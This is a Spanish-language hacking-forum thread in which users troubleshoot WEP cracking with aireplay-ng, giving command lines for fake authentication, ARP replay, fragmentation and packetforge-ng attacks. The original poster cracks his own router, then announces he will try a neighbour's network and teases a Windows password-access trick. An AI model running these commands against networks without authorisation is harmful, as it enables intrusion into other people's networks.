 Autor
|
Tema: Inyectar paquetes con aireplay-ng (Leído 20,509 veces)
|
rtl8187
 Desconectado
Mensajes: 16
|
Buenas a todo el foro, espero estar posteando en el lugar correcto (sino por favor paciencia, soy nuevo)
la realidad es que leyendo en el foro unos cuantos post y respuestas logré asociarme con un AP (que es mi propio router) pero cuando intento inyectar paquetes con aireplay-ng no puedo enviar ningun paquete.
Ej:
sudo aireplay-ng -1 30 -e Boquita -a 00:25:86:xx:xx:xx mon0
12:07:59 Waiting for beacon frame (BSSID: 00:25:86:xx:xx:xx)
12:07:59 Sending Authentication Request [ACK]
12:07:59 Authentication successful
12:07:59 Sending Association Request [ACK]
12:08:00 Association successful :-)
obtengo la asociacion, pero después,
sudo aireplay-ng -3 -b 00:25:86:XX:XX:XX mon0
12:10:51 Waiting for beacon frame (BSSID: 00:25:86:XX:XX:XX)
Saving ARP requests in replay_arp-0109-121051.cap
You should also start airodump-ng to capture replies.
Read 114626 packets (got 0 ARP request and 120 ACKs), sent 0 packets...(0 pps)
por lo tanto al leer los packets enviados la respuesta es cero (0)
que estoy haciendo mal? quedo a la escucha de cualquer consejo o bronca por si esta mal posteado.
Los mas cordiales saludos a todos.
|
|
|
|
|
En línea
|
|
|
|
Valsrock
Desconectado
Mensajes: 5
EL conocimiento es del mundo y para el mundo!!!!
|
Hola mi amigo, es muy probable que luego de hacer la asociacion en un rato el AP te desasocie (si quieres ver eso fijate lo q te dice el airodump-ng) . Te recomiendo que intentes con esto aireplay -1 6000 -o 1 -q 10 -e ESSID -a MAC_AP -h TU_MAC Interface lo que haras ahi es mandar un mensaje de "sigo aqui" al AP cada 10 segundos. Intenta con eso y nos comentas como va |
|
|
|
|
En línea
|
|
|
|
rtl8187
Desconectado
Mensajes: 16
|
Hola estimado ValsRock te comento que tengo el aireplay configurado para mandar paquetes de KEEP ALIVE cada 30 seg. y el airudump me muestra todo el tiempo asociado es decir
BSSID STATION PWR Rate Lost Packets probes
00:25:86:XX:XX:XX 00:1A:EF:XX:XX:XX 0 0- 0 0 4452
estuve leyendo que el ataque A3 aveces tarda hasta 2 horas en comenzar ya que nesecita conseguir almenos 1 ARP para comenzar a reenviarlo pero, ni modo, ya hace horas que esta lanzado el ataque A3 y ni 1 solo ARP ni 1 send. espero que se se ocurra algún consejo porque dentro de poco me ahorco con el cable que baja de la parabólica de +18 dBi.
gracias y pues hasta el proximo comentario, os invito a todos a opinar el caso.
|
|
|
|
|
En línea
|
|
|
|
ChimoC
Por la libertad y contra el terrorismo
Ex-Staff
Desconectado
Mensajes: 5.129
Paz, dignidad y justicia
|
Buenas: Se ha repetido hasta la saciedad que un A1 (asociación fasa)+A3 (inyección) NO siempre funciona, o bien a veces tarda horaSSSSSSSSSSS en funcionar. Prueba combinaciones...hay tutoriales que explican qué es cada ataue y para qué sirve cada uno Tambien hemos puesto bozal al buscador del foro, podeis usarlo que ya no muerde  Un saludo ChimoC |
|
|
|
|
En línea
|
|
|
|
rtl8187
Desconectado
Mensajes: 16
|
Hola ChimoC gracias por contestar el post, te comento que intenté todos los ataques pero pero la unica manera en el que aireplay no me contesta
Badd BSSID
No such BSSID available.
fue con el ataque que expliqué en el comienzo la unica forma en que almenos pone que lee los packets auque no pueda obtener ARP ni SEND XX packets, te comento que estoy con el buscador a full pero auque intento lo que alli dice no consigo lo que busco. Tu que ataques suguieres?
|
|
|
|
|
En línea
|
|
|
|
Valsrock
Desconectado
Mensajes: 5
EL conocimiento es del mundo y para el mundo!!!!
|
yo te sugiero que intentes con el ejemplo que te dí. Tambien deberias ver que tan cerca estas en realidad del AP porque las tarjetas tienes 2 propiedades, la de oir y la de emitir. Quiza no estas lo suficientemente cerca del AP como para lograr comunicarte con el.En todo caso otra solucion puede ser que intentes un atake de fragmentacion creo q es : aireplay-5 -b MAC_AP -h TU_MAC Interface packetforge-ng -0 -a MAC_AP -h TU_MAC -k 255.255.255.255 -l 255.255.255.255.255 -y archivodeatakeanterior.xor -w
cualkiernombre aireplay-ng -2 -r cualkiernombre Interface otra recomendacion que te doy , al menos si estas usando el chipset rt8187l es que no siempre funciona falseando la mac, por lo q sera mejor que uses la MAC original de tu tarjeta.  |
|
|
|
« Última modificación: 9 Enero 2010, 19:18 pm por Valsrock »
|
En línea
|
|
|
|
rtl8187
Desconectado
Mensajes: 16
|
Gracias otra vez estimado Valsrock, voy a seguir tus indicaciones, y os comento que:
deje el aireplay-ng funcionando aunque no consiguio ningun ARP ni SEND y fui a enborracharme a la cocina... cuando vuelvo a la pc (despues de un par de horas) estaba con 300.000 ARP y 1.200.000 Packets enviados y el replayxxxx.cap que hace el aireplay no sirve para nada (tenia solo 4 IV) pero el .cap del airodump-ng tenia mas de 7.000 IV lo pasé por aircrack-ng y me encontré con mi propia contraseña del router. es decir: lo logré la contraseña era la de mi red y la decriptó por completo, ahora se que tengo un cifrado y contraseña vulnerable (pero mi router es viejo, solo admite OPN o como mucho WEP) les agradezco por su gran ayuda y en honor al nombre del foro voy a probarlo con alguna red vecina sólo para la expriencia, (si ya tengo internet, para qué le voy a sacar ancho de banda a otro?)
mil gracias a todos y posteen todo lo que crean que aporte en algo a la comunidad.
para devolver el favor estén atentos a los post del otro OS 'windoors' que les enseñare como desde la linea de command con sólo una linea de programación podeis acceder a cualquier usuario y contraseña, borrarlo, cambiar la pass y ver archivos cifrados... será en poco tiempo...
gracias. sigan posteando...hasta luego.
|
|
|
|
|
En línea
|
|
|
|
+Allan+
Desconectado
Mensajes: 9
|
yo tengo el mismo problema k tu rtl8187 e intentado de todo pero nada k los datas me suben no consigo nada ni tampoco ni un ARP noc k mas hacer si alguien me puede ayudar le agradeceria mucho si me digeran k podria hacer
mi tARrgeta es una atheros ar928x
uso backtrack 4 y el sistema operativo de mi pc es windows 7
espero k me ayuden
un saludo......
|
|
|
|
|
En línea
|
|
|
|
brejellos
Desconectado
Mensajes: 1
|
muy buenas.... yo tengo una gsky con chipset rtl8187l y la unica forma de inyectar que e encontrado fue esta....(usando wifiway 1.0) aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b (mac victima) -h (nuestra mac) mon0 aireplay-ng -2 -p 0841 -c ff:ff:ff:ff:ff:ff -b 00:11:24:54:54:54 -h 00:11:22:33:44:55 mon0 de toda forma intenta usar la tu mac original....  |
|
|
|
|
En línea
|
|
|
|
netbalron
Desconectado
Mensajes: 1
|
Hola He visto este hilo en el Foro y creo q es aki donde os tengo dejar mi duda; si no corregirme y perdonad las molestias y enhorabuena por el foro esta genial!!!
Pues resulta q me he pillado una Tarjeta USB con la intencion de probar la seguridad de los AP en mi trabajo y tras leer los cometarios me decidi por un GSKY 500 mw Chipt RTL8187L, Ya la tengo, pero despues de probar con Wifiway 1.0, Wifislax 3.1 y Bacltrack4 y el propio que trae la caja de la tarjeta(Backtrak3) no consigo obtener ARP ni a los 300.000 IVS , mi primer mosqueo esta en q todas la Live me la detectan como RTL8187 (sin L) y no como RTL 8187L y no se si eso sera el problema de todo, ¿podriais decirme si funciona con un este chip (RTL8187)? saliendo de esa duda ya determinaria en cambiarla* o seguir intentandolo
*hable con el proveedor y le made la tarjeta pero me la han devuelto dicendo q esta correcta; claro q esta correcta (se conecta ok y navega bien) pero no es el chip que anuncian, por que si en la publi pone un RTL 8187L, deberia ser asi y traer ese chip, ya que la compre expecificamete porque tenia ese chipset y no el RTL8187
Nada mas muchas gracias y un saludo
|
|
|
|
|
En línea
|
|
|
|
|
| Mensajes similares |
|
Asunto |
Iniciado por |
Respuestas |
Vistas |
Último mensaje |
|
|
|
consulta inyectar paquetes commview/aireplay-ng (windows)
Wireless en Windows
|
elfasito
|
1
|
6,517
|
26 Noviembre 2010, 21:16 pm
por Carloswaldo
|
|
|
|
Error al inyectar paquetes en Ubuntu 10.10
Wireless en Linux
|
virtual31
|
1
|
2,607
|
5 Septiembre 2011, 12:20 pm
por -- KiLiaN --
|
|
|
inyectar paquetes en 54e
Hacking Wireless
|
pakias
|
2
|
2,699
|
29 Septiembre 2011, 03:41 am
por pakias
|
|
|
|
inyectar paquetes con wifiway 2.0.3
Seguridad
|
juaniquillo80
|
0
|
2,713
|
26 Febrero 2012, 17:03 pm
por juaniquillo80
|
|
|
|
Aireplay congelado al inyectar paquetes
Hacking Wireless
|
Oficinista
|
1
|
2,239
|
23 Septiembre 2014, 22:01 pm
por Sh4k4
|
 |
